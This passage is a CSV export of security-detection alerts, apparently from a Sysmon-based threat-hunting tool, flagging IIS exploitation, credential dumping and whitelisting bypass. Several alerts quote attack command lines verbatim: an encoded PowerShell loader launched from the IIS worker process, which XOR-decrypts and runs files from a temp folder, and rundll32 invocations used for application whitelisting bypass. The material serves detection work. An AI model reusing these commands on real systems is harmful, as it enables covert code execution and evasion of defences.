AXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==) and Parent Image :C:\Windows\System32\inetsrv\w3wp.exe , Parent CommandLine (c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20) in directory : ( C:\Windows\Temp\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 20 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.560 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-3251-5CEB-0000-00109E06E100 + 748 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243544 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.077 + 747F3D96-9F69-5E75-0000-0010476F2000 + 7836 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16507 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:09:02.275 + 365ABB72-532E-5CD8-0000-00106C222700 + 1528 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 20 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:13.560 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5875 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:28:42.700 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AG